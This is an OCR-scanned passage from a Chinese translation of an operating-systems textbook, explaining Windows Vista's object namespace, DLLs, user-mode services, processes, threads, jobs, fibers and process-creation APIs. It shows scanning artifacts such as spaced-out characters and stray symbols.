理 名 字 空 间 的 注册 表 名 字 空 间 的 加 载 点 。 通 常 只 有 一 个 名 为 REGISTRY 关 键 对象 ， 负 责 链 接 到 注册 表 刍 
值 和 NT 名 字 空 间 的 值 。 

对 象 目录 和 符号 链接 完全 是 本 地 对 象 管理 器 的 NT 名 字 空 间 的 一 部 分 。 它 们 是 类 似 于 和 它们 对 应 的 
文件 系统 部 分 : 目录 允许 要 收集 一 些 相关 的 对 象 。 符号 链接 允许 对 象 名 字 空 间 来 引用 一 个 对 象 名 字 空 间 
的 不 同 部 分 中 的 对 象 的 一 部 分 的 名 称 。 

每 个 已 知 的 操作 系统 的 设备 有 一 个 或 多 个 设备 对 象 包含 有 关 它 的 信息 ， 并 且 由 系统 引用 该 设备 。 最 
后 ， 每 个 已 加 载 设备 驱动 程序 在 对 象 空间 中 有 一 个 驱动 程序 对 象 。 上 驱动 程序 对 象 被 所 有 那些 表示 被 这 些 
驱动 控制 的 设备 的 实例 共享 。 

其 他 没有 介绍 的 对 象 有 更 多 特别 的 目的 ， 如 同 内 核 事务 的 交互 或 Win32 线 程 池 的 工作 线程 工厂 交互 。 


1.34 子 系统 、 DLL 和 用 户 态 服务 

回 到 图 11-6， 我 们 可 以 看 到 Windows Vista 操作 系统 是 由 内 核 太 中 的 组 件 和 用 户 态 的 组 件 组 成 的 。 
现在 我 们 已 经 介绍 完了 我 们 的 内 核 太 组件， 因此， 我 们 接 下 来 看 看 用 户 态 组 件 。 其 中 对 于 Windows 有 
三 种 组 件 尤为 重要 : 环境 子 系统 、DLL 和 服务 进程 。 

我 们 已 介绍 Windows 子 系统 模型 ， 所 以 这 里 不 作 更 多 详细 介绍 ， 而 主要 是 关注 原始 设计 的 NT， 子 
系统 被 视 为 一 种 利用 内 核 态 运行 相同 底层 软件 来 支持 多 个 操作 系统 个 性 化 的 方法 。 也 许 这 是 试图 避免 操 
作 系 统 竞争 相同 的 平台 ， 例 如 在 DEC 的 VAX 上 的 VMS 和 Berkeley UNIX, 或 者 也 许 在 微软 没有 人 知道 
OS/2 是 否 会 成 为 一 个 成 功 的 编程 接口 ， 他 们 加 上 了 他 们 的 投注 。 结 果 ，OS/2 成 为 无 关 的 后 来 者 ， 而 
Win32 АРІ 设计 为 与 Windows 95 结 合并 成 为 主导 。 

Windows 用 户 态 设计 的 第 二 个 重要 方面 是 在 动态 链接 库 (DLL), 即 代码 是 在 程序 运行 的 时 候 完成 
的 链接 ， 而 非 编译 时 。 共 享 的 库 不 是 一 个 新 的 概念 ， 最 现代 化 的 操作 系统 使 用 它们 。 在 Windows 中 几 
平 所 有 库 都 是 DLL， 从 每 -个 进程 都 装载 的 系统 库 mtdll.dll 到 旨 在 允许 应 用 程序 开发 人 员 进 行 代码 通 用 的 
功用 函数 的 高 层 程 序 库 。 

DLL 通 过 允许 在 进程 之 间 共享 通用 代码 来 提高 系统 效率 ， 保 持 常用 代码 在 内 存 中 ， 处 理 减少 从 程序 
磁盘 到 内 存 中 的 加 载 时 间 。 并 允许 操作 系统 的 库 代码 进行 更 新 时 无 需 重新 编译 或 重新 链接 所 有 使 用 它 的 
应 用 程序 ， 从 而 提高 系统 的 使 用 能 力 。 

此 外 ， 共 享 的 库 介 绍 版 本 控制 的 问题 ， 并 增加 系统 的 复杂 性 ， 因为 为 帮助 某 些 特定 的 应 用 而 引入 的 
更 改 可 能 会 给 其 他 的 一 些 特定 的 应 用 带 来 可 能 的 错误 , 或 者 因为 实现 的 改变 而 破坏 了 一 些 其 他 的 应 用 一 一 
这 是 一 个 在 Windows 世 界 称 为 DLL 黑 洞 的 问题 。 

DLL 的 实现 在 概念 上 是 简单 的 。 并 非 直接 调用 相同 的 可 执行 映像 中 的 子 例 程 的 代码 ， 一 定 程度 的 
间接 性 引用 被 编译 器 引入 : ТАТ (导入 地 址 表 )。 当 可 执行 文件 被 加 载 时 ， 它 查找 也 必须 加 载 的 DLL 的 列 
表 (这 将 是 一 个 图 结构 ， 因为 这 些 DLL 本 身 会 指定 它们 所 需要 的 其 他 的 DLL 列 表 )。 所 需 的 DLL 被 加 载 
并 且 填 写 好 它们 的 IAT。 

现实 是 更 复杂 的 。 另 一 个 问题 是 代表 DLL 之 间 的 关系 图 可 以 包含 环 ， 或 具有 不 确定 性 行为 ， 因 此 计 
算 要 加 载 的 DLL 列 表 可 以 导致 不 能 运行 的 结果 。 此 外 ， 在 Windows 中 DLL 代 码 库 有 机 会 来 运行 代码 ， 只 
要 它们 加 载 到 了 进程 中 或 者 创建 一 个 新 线程 。 通 常 ， 这 是 使 它们 可 以 执行 初始 化 ， 或 为 每 个 线程 分 配 存 
储 空间 ， 但 许多 DLL 在 这 些 附 加 例 程 中 执行 大 量 的 计算 。 如 果 任何 函数 调用 的 一 个 附加 例 程 需要 检查 加 
载 的 DLL 列表 ， 死 锁 可 能 会 发 生 在 这 个 过 程 。 

DLL 用 于 不 仅仅 共享 常见 的 代码 。 它们 还 可 以 启用 一 种 宿主 的 扩展 应 用 程序 模型 。Internet Explorer 
可 以 下 载 并 链接 到 DLL 调用 ActiveX 控件 。 另 一 端 互联 网 的 Web 服务 器 也 加 载 动态 代码 ， 以 为 它们 所 
显示 的 网 页 产生 更 好 的 Web 体 验 。 像 Microsoft Office 的 应 用 程序 允许 链接 并 运行 DLL， 使 得 Office 可 以 类 
似 一 个 平台 来 构建 新 的 应 用 程序 。COM (组 件 对 象 模型 ) 编程 模式 允许 程序 动态 地 查找 和 加 载 编写 来 提 
供 特定 发 布 接口 的 代码 ， 这 就 导致 几乎 所 有 使 用 COM 的 应 用 程序 都 以 in-process 的 方式 来 托管 DLL。 


484 ЕЕ 4 


所 有 这 类 动态 加 载 的 代码 ， 为 操作 系统 造成 了 更 大 的 复杂 性 ， 因 为 程序 库 的 版 本 管理 不 是 只 为 可 执 
行 体 匹 配对 应 版 本 的 DLL ， 而 是 有 时 把 多 个 版 本 的 同一 个 DLL 加 载 到 进程 中 一 Microsoft 称 之 为 启 并 
ÀA (side-by-side)。 单 个 的 程序 可 以 承载 两 个 不 同 的 DLL， 每 个 可 能 要 加 载 同一 个 Windows 库 一 一 但 对 
该 库 的 版 本 有 不 同 要 求 。 

较 好 的 解决 方案 是 把 代码 放 到 独立 的 进程 里 。 而 在 进程 外 承载 的 代码 结果 具有 较 低 的 性 能 ， 并 在 很 
多 情况 下 会 带 来 一 个 更 复杂 的 编程 模型 。 微 软 尚未 提供 在 用 户 态 下 来 处 理 这 种 复杂 度 的 一 个 好 的 解决 办 
法 。 但 这 让 人 对 相对 简单 的 内 核 态 产生 了 希望 。 

该 内 核 态 具有 较 少 的 复杂 性 ， 是 因为 它 相 对 于 用 户 态 提供 了 更 少 的 对 外 部 设备 驱动 模型 的 支持 。 
在 Windows H, 系统 功能 的 扩展 是 通过 编写 用 户 态 服务 来 实现 的 。 这 对 于 子 系统 运行 得 很 好 ， 并 且 在 只 
有 很 少 更 新 的 时 候 ， 而 不 是 整个 系统 的 个 性 化 的 情况 下 ， 能 够 取得 更 好 的 性 能 。 在 内 核实 现 的 服务 和 在 
用 户 态 进程 实现 的 服务 之 间 只 有 很 少 的 功能 性 差异 。 内 核 和 过 程 都 提供 了 专用 地 址 空间 ， 可 以 保护 数据 
结构 和 服务 请 求 可 以 被 审议 。 

但 是 ， 可 能 会 与 服务 的 用 户 态 处 理 内 核 中 服务 有 重大 的 性 能 差异 。 通过 现代 的 硬件 从 用 户 态 进入 内 
核 是 很 慢 的 ， 但 是 也 比 不 上 要 来 回 切换 两 次 的 更 慢 ， 因为 还 需要 从 内 存 切 换 出 来 进入 另 一 个 进程 。 而 且 
跨 进程 通信 带宽 较 低 。 

内 核 态 代码 (非常 仔细 地 ) 可 以 把 用 户 态 处 理 的 数据 作为 参数 传递 给 其 系统 调用 的 方式 来 访问 数据 。 
通过 用 户 态 的 服务 ， 数 据 必须 被 复制 到 服务 进程 或 由 映射 内 存 等 提供 的 一 些 机 制 (Windows Vista 中 的 
ALPC 功 能 在 后 台 处 理 ) 。 

将 来 跨 地 址 空间 的 切换 代价 很 可 能 会 越 来 越 小 ， 保 护 模式 将 会 减少 ， 或 甚至 成 为 不 相关 。 在 
Singularity 中 ， 微 软 研究 院 (Fandrich 等 人 ，2006 年 ) 使 用 运行 时 技术 ， 类 似 C# 和 Java， 用 来 做 一 个 完 
全 软件 问题 的 保护 。 这 就 要 求 地 址 空间 的 切换 或 保护 模式 下 没有 硬件 的 切换 代价 。 

Windows Vista 利 用 用 户 态 的 服务 进程 极 大 地 提升 了 系统 的 性 能 。 其 中 一 些 服务 是 同 内 核 的 组 件 紧 
密 相关 的 ， 例 如 lsass.exe 这 个 本 地 安全 身份 验证 服务 ， 它 管理 了 表示 用 户 身份 的 令 牌 (token) 对 象 ， 以 
及 文件 系统 用 来 加 密 的 密 钥 。 用 户 态 的 即 插 即 用 管理 器 负责 确定 要 使 用 新 的 硬件 设备 所 需要 的 正确 的 驱 
动 程序 来 安装 它 ， 并 告诉 内 核 加 载 它 。 系 统 的 很 多 功能 是 由 第 三 方 提供 的 ， 如 防 病毒 程序 和 数字 版 权 管 
理 ， 这 些 功能 都 是 作为 内 核 态 驱动 程序 和 用 户 态 服务 的 组 合 方式 实现 的 。 

在 Windows Vista 中 taskmgr.exe 有 一 个 选项 卡 ， 标 识 在 系统 上 运行 的 服务 。( 早 期 版 本 的 Windows 
将 显示 服务 使 用 net start 命令 的 列表 )。 很 多 服务 是 运行 在 同一 进程 (svchost.exe) 中 的 。Windows 也 
利用 这 种 方式 来 处 理 自己 启动 时 间 的 服务 ， 以 减少 启动 系统 所 需 的 时 间 。 服务 可 以 合并 到 相同 的 进程 ， 
只 要 它们 能 安全 地 使 用 相同 的 安全 凭据 。 

在 每 个 共享 的 服务 进程 内 ， 个 体 服务 是 以 DLL 的 形式 加 载 的 。 它 们 通常 利用 Win32 的 线程 池 的 功能 
来 共享 一 个 进程 地， 这 样 对 于 所 有 的 服务 ， 只 需要 运行 最 小 数目 的 线程 。 

服务 是 系统 中 常见 的 安全 漏洞 的 来 源 ， 因 为 它们 是 经 常 是 可 以 远程 访问 的 (取决 于 TCP/IP 防火 墙 和 
下 安全 设置 )， 且 不 是 所 有 程序 员 都 是 足够 仔细 的 ， 他 们 很 可 能 没有 验证 通过 RPC 传 递 的 参数 和 缓冲 区 。 

一 直 在 Windows 中 运行 的 服务 的 数目 是 令 人 惊讶 的 。 但 这 些 服务 中 的 很 少 一 部 分 不 断 收 到 单个 请 求 ， 
如 果 有 ， 那 这 样 的 进程 看 起 来 就 像 是 远程 的 攻击 者 试图 找到 系统 的 漏洞 。 结果 是 越 来 越 多 的 服务 在 
Windows 中 被 默认 为 是 关闭 的 ， 特 别 是 Windows Server 的 相关 版 本 。 


11.4 Windows Vista 中 的 进程 和 线程 

Windows 具有 大 量 的 管理 CPU 和 资源 分 组 的 概念 。 以 下 各 节 中 ， 我 们 将 检查 这 些 有 关 的 Win32 
API 调用 的 讨论 ， 并 介绍 它们 是 如 何 实现 的 。 
1141 基本 概念 

在 Windows Vista 中 的 进程 是 程序 的 容器 。 它 们 持 有 的 虚拟 地 址 空间 ， 以 及 指向 内 核 态 的 对 象 的 线 
程 的 句柄 。 作 为 线程 的 容器 ， 它 们 提供 线程 执行 所 需要 的 公共 资源 ， 例如 配额 结构 的 指针 、 共 享 的 令 牌 
对 象 以 及 用 来 初始 化 线程 的 默认 参数 一 一 包括 优先 次 序 和 调度 类 。 每 个 进程 都 有 用 户 态 系统 数据 ， 称 为 
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РЕВ (进程 环境 块 )。PEB 包 括 已 加 载 的 模块 (如 EXE 和 DLL) 列表 ， 包 含 环境 字符 串 的 内 存 、 当 前 的 
工作 目录 和 管理 进程 堆 的 数据 一 一 以 及 很 多 随 着 时 间 的 推移 已 添加 的 Win32 cruft。 

线程 是 在 Windows 中 调度 CPU 的 内 核 抽象 。 优 先 级 是 基于 进程 中 包含 的 优先 级 值 来 为 每 个 线程 分 配 
的 。 线 程 也 可 以 通过 亲 和 处 理 只 在 某 些 处 理 器 上 运行 。 这 有 助 于 显 式 分 发 多 处 理 器 上 运行 的 并 发 程序 的 
工作 。 每 个 线程 都 有 两 个 单独 调用 堆栈 ， 一 个 在 用 户 态 执行 ， 另 一 个 内 核 态 执行 。 也 有 TEB (线程 环境 
Ж) 使 用 户 态 数据 指定 到 线程 ， 包 括 每 个 线程 存储 区 (线程 本 地 存储 区 ) 和 Win32 字 段 、 语 言 和 文化 本 
地 化 以 及 其 他 专门 的 字段 ， 这 些 字段 都 被 各 种 不 同 的 功能 添加 上 了 。 

除了 PEB 与 TEB 外 ， 还 有 另 一 个 数据 结构 ， 内 核 态 与 每 个 进程 共享 的 ， 即 用 户 共享 数据 。 这 个 是 可 
以 由 内 页 ， 但 是 每 个 用 户 态 进程 只 能 读 。 它 包 含 了 一 系列 的 由 内 核 维护 的 值 ， 如 各 种 时 间 、 版 
本 信息 、 物 理 内 存 和 大 量 的 被 用 户 态 组 件 共享 的 标志 ， 如 COM、 终 端 服务 和 调试 程序 。 有 关 使 用 此 只 
读 的 共享 页 ， 纯 粹 是 出 于 性 能 优化 的 目的 ， 因 为 值 也 能 获得 通过 系统 调用 到 内 核 态 获得 。 但 系统 调用 是 
比 一 个 内 存 访问 代价 大 很 多 ， 所 以 对 于 大 量 由 系统 维护 的 字段 ， 例 如 时 间 ， 这 样 的 处 理 就 很 有 意义 。 其 
他 字段 ， 如 当前 时 区 更 改 很 少 ， 但 依赖 于 这 些 字段 的 代码 必须 查询 它们 往往 只 是 看 它们 是 否 已 更 改 。 

1. 进程 

进程 创建 是 从 段 对 象 创建 的 ， 每 个 段 对 象 描述 了 磁盘 上 菜 个 文件 的 一 个 内 存 对 象 。 在 创建 一 个 过 
程 时 创建 的 进程 将 接收 一 个 句柄 ， 这 个 句柄 允 许 它 通过 映射 段 、 分 配 虚拟 内 存 、 写 参数 和 环境 变量 数据 、 
复制 文件 描述 符 到 它 的 句柄 表 、 创 建 线程 来 修改 新 的 进程 。 这 非常 不 同 于 在 UNIX 中 创建 进程 的 ， 反 映 
了 Windows 与 UNIX 初始 设计 目标 系统 的 不 同 。 

正如 11.1 节 所 描述 ，UNIX 是 为 16 位 单 处 理 器 系统 设计 的 ， 而 这 样 的 单 处 理 器 系统 是 用 于 在 进程 之 
间 交 换 共享 内 存 的 。 这 样 的 系统 中 ， 进 程 作为 并 发 的 单元 ， 并 且 使 用 像 fork 这 样 的 操作 来 创建 进程 是 一 
个 天 才 般 的 设计 主意 。 如 果 要 在 很 小 的 内 存 中 运行 一 个 新 的 进程 ， 并 且 没 有 硬件 支持 的 虚拟 内 存 ， 那 么 
在 内 存 中 的 进程 就 不 得 不 换 出 到 磁盘 以 创建 空间 。UNIX 操 作 系统 (一 种 多 用 户 的 计算 机 操作 系统 ) 最 
初 仅仅 通过 简单 的 父 进 程 交换 技术 和 传递 其 物理 内 存 给 它 的 子 进程 来 实现 fork。 这 种 操作 和 运行 几乎 是 
没有 代价 的 。 

相 比 之 下 ， 在 Cutler 小 组 开发 NT 的 时 代 ， 当 时 的 硬件 环境 是 32 位 多 处 理 器 系统 与 虚拟 内 存 硬件 共享 
1~16 兆 字 节 的 物理 内 存 。 多 处 理 器 为 部 分 程序 并 行 运行 提供 了 可 能 ， 因 此 NT 使 用 进程 作为 共享 内 存 和 
数据 资源 的 容器 ， 并 使 用 线程 作为 并 发 调度 单元 。 

当然 ， 随 后 几 年 里 的 系统 就 完全 不 同 于 这 些 环境 了 。 例 如 拥有 64 位 地 址 空间 并 且 一 个 芯片 上 集成 十 
JLA (DERETA) CPU 内 核 ， 存 储 体系 结构 中 若干 GB 大 小 的 物理 内 存 以 及 闪存 设备 和 其 他 非 易 失 存 
储存 设备 的 加 入 ， 更 广泛 虚拟 化 、 普 适 网 络 的 支持 ， 以 及 例如 事件 型 内 存 (transactional memory) 这 类 
同步 技术 的 创新 。 Windows 和 UNIX 操 作 系统 无 疑 将 继续 适应 现实 中 新 的 硬件 ， 但 我 们 更 感 兴趣 的 是 ， 
会 有 哪些 新 的 操作 系统 会 基于 新 硬件 而 被 特别 设计 出 来 。 

2. 作业 和 纤 程 

Windows 可 以 将 进程 分 组 为 作业 ， 但 作业 抽象 并 不 足够 通用 。 原 因 是 其 专 为 限制 分 组 进程 所 包含 的 
线程 而 设计 ， 如 通过 限制 共享 资源 配额 、 强 制 执行 受 限 令 牌 (restricted token) 来 阻止 线程 访问 许多 系 
统 对 象 。 作 业 最 重要 的 特性 是 一 旦 一 个 进程 在 作业 中 ， 该 进程 创建 的 进程 、 线 程 也 在 该 作业 中 ， 没有 特 
例 。 就 像 它 的 名 字 所 示 ， 作 业 是 为 类 似 批 处 理 环境 而 非 交互 式 计算 环境 而 设计 的 。 

一 个 进程 最 多 属于 一 个 作业 。 这 是 有 道理 的 ， 因 为 很 难 去 定义 一 个 进程 必须 服从 多 个 共享 配额 或 限 
制 令 牌 的 情况 。 但 这 也 意味 着 ， 如 果 有 多 个 系统 服务 尝试 使 用 作业 来 管理 同一 部 分 进程 ， 则 会 产生 冲突 。 
例如 ， 如 果 进 程 首先 将 自己 加 入 到 了 一 个 作业 中 ， 或 者 一 个 安全 的 工具 已 经 将 其 加 入 了 带 有 一 定 受 限 令 
牌 的 作业 中 ， 则 当 一 个 管理 工具 试图 将 进程 加 入 其 他 作业 以 限制 其 资源 时 将 会 失败 。 因此 在 Windows 中 
很 少 使 用 作业 。 

图 11-24 显 示 了 作业 、 进 程 、 线 程 和 纤 程 之 间 的 关系 。 作 业 包 含 进程 ， 进 程 包含 线程 ， 但 是 线程 不 
包含 纤 程 。 线 程 与 纤 程 通常 是 多 对 多 的 关系 。 
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图 11-24 作业 、 进 程 、 线 程 、 纤 程 之 间 的 关系 。 作 业 和 纤 程 是 可 选 的 ， 
并 不 是 所 有 的 进程 都 在 作业 中 或 者 包含 纤 程 


纤 程 通过 分 配 栈 与 用 来 存储 纤 程 相关 寄存 器 和 数据 的 用 户 态 纤 程 数据 结构 来 创建 。 线 程 被 转换 为 纤 
程 ， 但 纤 程 也 可 以 独立 于 线程 创建 。 这 些 新 创建 的 纤 程 直到 一 个 已 经 运行 的 纤 程 显 式 地 调用 
SwitchToFiber 函 数 才 开 始 执行 。 由 于 线程 可 以 尝试 切换 到 一 个 已 经 在 运行 的 纤 程 ， 因 此 ， 程 序 员 必须 
使 用 同步 机 制 以 防止 这 种 情况 发 生 。 

纤 程 的 主要 优点 在 于 纤 程 之 间 的 切换 开销 要 远 远 小 于 线程 之 间 的 切换 。 线 程 切换 需要 进出 内 核 而 纤 
程 切 换 仅 需 要 保存 和 恢复 几 个 寄存 器 。 

尽管 纤 程 是 协同 调度 的 ， 如 果 有 多 个 线程 调度 纤 程 ， 则 需要 非常 小 心地 通过 同步 机 制 以 确保 纤 程 之 
间 不 会 互相 干扰 。 为 了 简化 线程 和 纤 程 之 间 的 交互 ， 通 常 创建 和 能 运行 它们 的 内 核 数 目 一 样 多 的 线程 ， 
并 且 让 每 个 线程 只 能 运行 在 一 套 可 用 的 处 理 器 甚至 只 是 一 个 单一 的 处 理 器 上 。 

每 个 线程 可 以 运行 一 个 独立 的 纤 程 子 集 ， тата -对 多 的 关系 来 简化 同步 。 即 
便 如 此 ， 使 用 纤 程 仍 然 有 许多 困难 。 大 多 数 ЕЕ ER 


的 Win32 库 是 完全 不 识别 纤 程 的 ， 并 且 尝试 像 
使 用 线程 一 样 使 用 纤 程 的 应 用 会 过 到 各 种 错 rr ша 


误 。 由 于 内 核 不 识别 纤 程 ， 当 一 个 纤 程 进入 内 核 调度 的 实体 


内 核 时 ， 其 所 属 线程 可 能 阻塞 。 此 时 处 理 器 在 用 户 空间 管理 的 轻 量 级 线程 很 少 使 用 


会 调度 任意 其 他 线程 ， 导 致 该 线程 的 其 他 纤 


程 均 无 法 运行 。 因 此 纤 程 很 少 使 用 ， 除 非 从 81-25 CPU 和 资源 管理 所 使 用 的 基本 概念 
其 他 系统 移 村 那些 明显 需要 纤 程 提供 功能 的 代码 。 图 11-25 总 结 了 上 面 提 到 的 这 些 抽象 。 
з. 线程 


通常 每 一 个 进程 是 由 一 个 线程 开始 的 ， 但 一 个 新 的 进程 也 可 以 动态 创建 。 线 程 是 CPU 调度 的 基本 单 
位 ， 因 为 操作 系统 总 是 选择 一 个 线程 而 不 是 进程 来 运行 。 因 此 ， 每 一 个 线程 有 一 个 调度 状态 (就绪 态 、 
运行 态 、 阻 塞 态 等 )， 而 进程 没有 调度 状态 。 线 程 可 以 通过 调用 指定 了 在 其 所 属 进程 地 址 空间 中 的 开始 
运行 地 址 的 Win32 库 函数 动态 创建 。 
每 一 个 线程 均 有 一 个 线程 ID ， 其 和 进程 ID 取 自 同一 空间 ， 因 此 单一 的 ID 不 可 能 同时 被 一 个 线程 和 
个 进程 使 用 。 进程 和 线程 的 ID 是 4 的 倍数 ,， 因为 它们 实际 上 是 通过 用 于 分 配 ID 的 特殊 句柄 表 来 执行 分 配 的 。 
该 系统 复 用 了 如 图 11-18 和 图 11-19 所 示 的 可 扩展 句 栖 管理 功能 。 句 柄 表 没有 对 象 的 引用 ， 但 使 用 指针 指向 
进程 或 线程 ， 使 通过 ID 查找 一 个 进程 或 线程 非常 有 效 。 最 新 版 本 的 Windows 采 用 先进 先 出 顺序 管理 空闲 
句柄 列表 ， 使 ID 无 法 马上 重复 使 用 。ID 马 上 被 重复 使 用 的 问题 将 在 本 章 的 最 后 问题 部 分 再 讨论 。 
线程 通常 在 用 户 态 运行 ， 但 是 当 它 进行 一 个 系统 调用 时 ， 就 切换 到 内 核 态 ， 并 以 其 在 用 户 态 下 相同 
的 属性 以 及 限制 继续 运行 。 每 个 线程 有 两 个 堆栈 ， 一 个 在 用 户 态 使 用 ， 而 另 一 个 在 内 核 态 使 用 。 任 何 时 
使 当 一 个 线程 进入 内 核 态 ， 其 切换 到 内 核 态 堆栈 。 用 户 态 寄存 器 的 值 以 上 下 文 (context) 数据 结构 的 形 
式 保存 在 该 内 核 态 堆栈 底部 。 因 为 只 有 进入 内 核 态 的 用 户 态 线程 才 会 停止 运行 ， 当 它 没有 运行 时 该 上 下 
文 数据 结构 中 总 是 包括 了 其 寄存 器 状态 。 任 何 拥有 线程 句柄 的 进程 可 以 查看 并 修改 这 个 上 下 文 数据 结构 。 
线程 通常 使 用 其 所 属 进程 的 访问 令 牌 运行 ， 但 在 某 些 涉及 客户 机 /服务 器 计算 的 情况 下 ， 一 个 服务 
器 线程 可 能 需要 模拟 其 客户 端 ， 此 时 需要 使 用 基于 客户 端 令 牌 的 临时 令 牌 标识 来 执行 客户 的 操作 。( 一 
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般 来 说 服务 器 不 能 使 用 客户 端的 实际 令 牌 ， 因 为 客户 端 和 服务 器 可 运行 于 不 同 的 系统 。) 

1O 处 理 也 经 常 需要 关注 线程 。 当 执行 同步 JO 时 会 阻塞 线程 ， 并 且 异 步 JO 相 关 的 未 完成 的 UO 请 求 
也 关联 到 线程 。 当 一 个 线程 完成 执行 ， 它 可 以 退出 ， 此 时 任何 等 待 该 线程 的 /O 请 求 将 被 取消 。 当 进程 
中 最 后 一 个 活跃 线程 退出 时 ， 这 一 进程 将 终止 。 

需要 注意 的 是 线程 是 一 个 调度 的 概念 ， 而 不 是 一 个 资源 所 有 权 的 概念 。 任 何 线程 可 以 访问 其 所 属 进 
程 的 所 有 对 象 ， 只 需要 使 用 句柄 值 ， 并 进行 合适 的 Win32 调 用 。 一 个 线程 并 不 会 因为 一 个 不 同 的 线程 创 
建 或 打开 了 一 个 对 象 而 无 法 访问 它 。 系 统 甚至 没有 记录 是 哪 一 个 线程 创建 了 哪 一 个 对 象 。 一 旦 一 个 对 象 
甸 栖 已 经 在 进程 句柄 表 中 ， 任 何在 这 一 进程 中 的 线程 均 可 使 用 它 ， 即 使 它 是 在 模拟 另 一 个 不 同 的 用 户 。 

正如 前 面 所 述 ， 除 了 用 户 态 运行 的 正常 线程 ，Windows 有 许多 只 能 运行 在 内 核 态 的 系统 线程 ， 而 其 
与 任何 用 户 态 进 程 都 没有 联系 。 所 有 这 一 类 型 的 系统 线程 运行 在 一 个 特殊 的 称 为 系统 进程 的 进程 中 。 该 
进程 没有 用 户 态 地 址 空间 ， 其 提供 了 线程 在 不 代表 某 一 特定 用 户 态 进程 执行 时 的 环境 。 当 学 到 内 存 管理 
的 时 候 ， 我 们 将 讨论 这 样 的 一 些 线程 。 这 些 线程 有 的 执行 管理 任务 ， 例 如 写 脏 页 面 到 磁盘 上 ， 而 其 他 形 
成 了 工作 线程 池 ， 来 分 配 并 执行 部 件 或 驱动 程序 需要 系统 进程 执行 的 工作 。 


11.42 作业 、 进 程 、 线 程 和 纤 程 管理 API 调 用 

新 的 进程 是 由 Win32 API 函 数 CreatProcess 创 建 的 。 这 个 函数 有 许多 参数 和 大 量 的 选项 ， 包 括 被 执 
行文 件 的 名 称 ， 命 令 行 字符 串 〈 未 解析 ) 和 一 个 指向 环境 字符 串 的 指针 。 其 中 也 包括 了 控制 诸多 细节 的 
令 牌 和 数值 ， 这 些 细节 包括 了 如 何 配置 进程 和 第 一 个 线程 的 安全 性 ， 调 试 配置 和 调度 优先 级 等 。 其 中 一 
个 令 牌 指定 创建 者 打开 的 句柄 是 否 被 传递 到 新 的 进程 中 。 该 函数 还 接受 当前 新 进程 的 工作 目录 和 可 选 的 
带 有 关于 此 进程 使 用 GUI 窗口 的 相关 信息 的 数据 结构 。Win32 对 新 进程 和 其 原始 线程 都 返回 ID 和 句柄 ,而 
非 只 为 新 进程 返回 一 个 ID 号 。 

大 量 的 参数 揭示 了 Windows 和 UNIX 在 进程 创建 的 开发 设计 上 的 诸多 的 不 同 之 处 。 

1) 寻找 执行 程序 的 实际 搜索 路 径 隐 藏 在 Win32 的 库 代 码 里 ， 但 UNIX 中 则 显 式 地 管理 该 信息 。 

2) 当前 工作 目录 在 UNIX 操 作 系统 里 是 一 个 内 核 态 的 概念 ， 但 是 在 Windows 里 是 用 户 态 字符 串 。 
Windows 为 每 个 进程 都 打开 当前 目录 的 一 个 句柄 ， 这 导致 了 和 UNIX 一 样 的 麻烦 :除了 碰巧 工作 目录 是 
跨 网 络 的 情况 下 可 以 删除 它 ， 其 他 工作 目录 都 是 不 能 删除 的 。 

3) UNIX 解 析 命 令 行 ， 并 传递 参数 数组 ， 而 Win32 需 要 每 个 程序 自己 解析 参数 。 其 结果 是 ， 不 同 的 
程序 可 能 采用 不 一 致 的 方式 处 理 通配符 (如 *.txt) 和 其 他 特殊 字符 。 

4) 在 UNIX 中 ， 文 件 描述 符 是 否 可 以 被 继承 是 句柄 的 一 个 属性 。 不 过 在 Windows 中 ， 其 同时 是 句柄 
和 进程 创建 参数 的 属性 。 

5) Win32 是 面向 图 形 用 户 界面 的 ， 因 此 新 进程 能 直接 获得 其 窗口 信息 ， 而 在 UNIX 中 ， 这 些 信息 是 
通过 参数 传递 给 图 形 用 户 界面 程序 的 。 

6) Windows 中 的 可 执行 代码 没有 SETUID 位 属性 ， 不 过 一 个 进程 也 可 以 为 另 一 个 用 户 创建 进程 ， 只 
要 其 能 获得 该 用 户 的 信用 标识 。 

7) Windows 返 回 的 进程 、 线 程 句 柄 可 以 用 在 很 多 独立 的 方法 中 修改 新 进程 /线程 ， 例 如 复制 句柄 、 
在 新 进程 中 设置 环境 变量 等 。UNIX 则 只 在 fork 和 exec 调 用 的 时 候 修改 新 进程 。 

这 些 不 同 有 些 是 来 自 历史 原因 和 和 哲学 原因 。UNIX 的 设计 是 面向 命令 行 的 ， 而 不 是 像 Windows 那 样 
面向 图 形 用 户 界面 的 。UNIX 的 用 户 相 比 来 说 更 高 级 ， 同 时 也 懂得 像 PATH 环境 变量 的 概念 。Windows 
Vista 继 承 了 很 多 MS-DOS 中 的 东西 。 

这 种 比较 也 有 点 偏 三 ， 因 为 Win32 是 一 个 用 户 态 下 的 对 NT 本 地 进程 执行 的 包装 器 ， 就 像 UNIX 下 的 
系统 库 函 数 fork/exec 的 封装 。 实 际 的 NT 中 创建 进程 和 线程 的 系统 调用 NtCreateProcess 和 
NtCreateThread 比 Win32 版 本 简单 得 多 。NT 进 程 创建 的 主要 参数 包括 代表 所 要 运行 的 程序 文件 句 栖 、 
-个 指定 新 进程 是 否 默认 继承 创建 者 句柄 的 标志 ， 以 及 有 关 安全 模型 的 相关 参数 。 由 于 用 户 态 下 的 代码 
能 够 使 用 新 建 进程 的 句柄 能 对 新 进程 的 虚拟 地 址 空间 进行 直接 的 操作 ， 所 有 关于 建立 环境 变量 、 创 建 初 
始 线程 的 细节 就 留 给 用 户 态 代码 来 解决 。 

为 了 支持 POSIX 子 系统 ， 本 地 进程 创建 有 一 个 选项 可 以 指定 ， 通 过 拷贝 另 一 个 进程 的 虚拟 地 址 空间 
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来 创建 一 个 新 进程 ， 而 不 是 通过 映射 一 个 新 程序 的 段 对 象 来 新 建 进程 。 这 种 方式 只 用 在 实现 POSIX 的 
fork， 而 不 是 Win32 的 。 

线程 创建 时 传 给 新 线程 的 参数 包括 : CPU 的 上 下 文 信息 (包括 栈 指针 和 起 始 指令 地 址 )、TEB 模 板 、 
一 个 表示 线程 创建 后 马上 运行 或 以 挂 起 状态 创建 (等 待 有 人 对 线程 句柄 调用 NtResumeThread 函 数 ) 的 标 
志 。 用 户 态 下 的 栈 的 创建 以 及 argv/argc 参 数 的 压 人 需要 由 用 户 态 下 的 代码 来 解决 ， 必 须 对 进程 句柄 调 用 
本 地 NT 的 内 存 管理 API。 

在 Windows Vista 的 发 行 版 中 ， 包 含 了 一 个 新 的 关于 进程 操作 方面 的 本 地 AP1， 这 个 接口 将 原来 许多 
